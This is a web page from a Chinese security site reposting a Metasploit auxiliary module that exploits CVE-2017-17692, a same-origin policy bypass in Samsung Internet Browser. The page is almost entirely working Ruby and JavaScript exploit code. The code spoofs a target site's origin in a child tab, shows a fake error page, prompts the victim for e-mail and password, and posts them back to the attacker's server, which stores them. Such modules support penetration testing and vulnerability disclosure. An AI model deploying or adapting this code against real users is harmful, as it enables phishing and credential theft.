首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Samsung Internet Browser - SOP Bypass
来源:metasploit.com 作者:Martin 发布时间:2017-12-21  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Samsung Internet Browser SOP Bypass',
        'Description'    => %q(
          This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
          Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
          By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
          credentials via a fake pop-up.
        ),
        'License'        => MSF_LICENSE,
        'Author'         => [
          'Dhiraj Mishra', # Original discovery, disclosure
          'Tod Beardsley', # Metasploit module
          'Jeffrey Martin' # Metasploit module
        ],
        'References'     => [
        [ 'CVE', '2017-17692' ],
        ['URL', 'http://fr.0day.today/exploit/description/28434']
        ],
        'DisclosureDate' => 'Nov 08 2017',
        'Actions'        => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction'  => 'WebServer'
      )
    )
 
  register_options([
      OptString.new('TARGET_URL', [
        true,
        'The URL to spoof origin from.',
        'http://example.com/'
      ]),
      OptString.new('CUSTOM_HTML', [
        true,
        'HTML to display to the victim.',
        'This page has moved. Please <a href="#">click here</a> to redirect your browser.'
      ])
    ])
 
  register_advanced_options([
    OptString.new('CUSTOM_JS', [
      false,
      "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
      ''
    ])
  ])
 
  end
 
  def run
    exploit # start http server
  end
 
  def evil_javascript
    return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank?
    js = <<-EOS
      setTimeout(function(){
        x.document.body.innerHTML='<h1>404 Error</h1>'+
        '<p>Oops, something went wrong.</p>';
        a=x.prompt('E-mail','');
        b=x.prompt('Password','');
        var cred=JSON.stringify({'user':a,'pass':b});
        var xmlhttp = new XMLHttpRequest;
          xmlhttp.open('POST', window.location, true);
          xmlhttp.send(cred);
        }, 3000);
    EOS
    js
  end
 
  def setup
    @html = <<-EOS
        <html>
        <meta charset="UTF-8">
        <head>
        <script>
        function go(){
          try {
            var x = window.open('#{datastore['TARGET_URL']}');
            #{evil_javascript}
            } catch(e) { }
          }
        </script>
        </head>
        <body onclick="go()">
        #{datastore['CUSTOM_HTML']}
        </body></html>
      EOS
  end
 
  def store_cred(username,password)
    credential_data = {
      origin_type: :import,
      module_fullname: self.fullname,
      filename: 'msfconsole',
      workspace_id: myworkspace_id,
      service_name: 'web_service',
      realm_value: datastore['TARGET_URL'],
      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
      private_type: :password,
      private_data: password,
      username: username
    }
    create_credential(credential_data)
  end
 
  # This assumes the default schema is being used.
  # If it's not that, it'll just display the collected POST data.
  def collect_data(request)
    cred = JSON.parse(request.body)
    u = cred['user']
    p = cred['pass']
    if u.blank? || p.blank?
      print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
    else
      print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
      store_cred(u,p)
    end
  end
 
  def on_request_uri(cli, request)
    case request.method.downcase
    when 'get' # initial connection
      print_status("#{cli.peerhost}: Request '#{request.method} #{request.uri}'")
      print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore['TARGET_URL']}")
      send_response(cli, @html)
    when 'post' # must have fallen for it
      collect_data(request)
    else
      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
    end
  end
 
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Palo Alto Networks PAN-OS Cook
·Ability Mail Server 3.3.2 - Cr
·Tuleap 9.6 Second-Order PHP Ob
·Microsoft Windows Kernel - 'Nt
·Jenkins XStream Groovy classpa
·Linux Kernel >= 4.9 eBPF memor
·Microsoft Windows jscript!RegE
·Ruby < 2.2.8 / < 2.3.5 / < 2.4
·Microsoft Windows Array.sort j
·Cisco IOS 12.2 < 12.4 / 15.0 <
·Microsoft Internet Explorer 11
·Technicolor DPC3928SL - SNMP A
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved